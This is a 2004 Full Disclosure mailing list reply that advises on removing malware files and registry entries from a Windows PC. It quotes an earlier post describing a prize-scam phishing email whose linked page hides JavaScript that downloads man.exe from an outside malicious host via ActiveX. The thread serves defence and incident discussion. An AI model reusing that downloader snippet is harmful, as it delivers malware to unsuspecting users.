Full Disclosure mailing list archives
Re: Removal?
From: Anders <CNQQTROVMYSY () spammotel com>
Date: Wed, 4 Feb 2004 09:41:58 +0100
Hi,
Then you should be able to remove the files. I would also check the registry for entries. You can use Ctrl F to search for the file names "usr_crt.dll" and "faq.exe" in the registry and remove them. Then reboot, and you should be able to remove them.Norton is fully patched to current as is windows update.Any idea how this got on your computer?
It was installed by the "man.exe" he spoke of in an earlier post... (three hours before his first "Removal?" post) ---------- From: axid3j1al axid3j1al <axid3j1al () hotmail com> Subject: [Full-disclosure] Old Hack?
Has anyone see this little code injection hack. Is this old?
Email has subject line "congranulations! you won $1169" with body
http://sinaraevent.com/bbs/zipcode/6.htm
and code
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://sinaraevent.com/bbs/zipcode/man.exe",0); x.Send();
---------- ..... Best regards, Anders _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Removal? axid3j1al axid3j1al (Feb 02)
- RE: Removal? Mike (Feb 03)
- Re: Removal? Nico Golde (Feb 03)
- <Possible follow-ups>
- RE: Removal? Schmehl, Paul L (Feb 03)
- RE: Removal? axid3j1al axid3j1al (Feb 03)
- RE: Removal? Paul Schmehl (Feb 03)
- Message not available
- Re: Removal? Anders (Feb 04)
- RE: Removal? Paul Schmehl (Feb 03)
- RE: Removal? axid3j1al axid3j1al (Feb 03)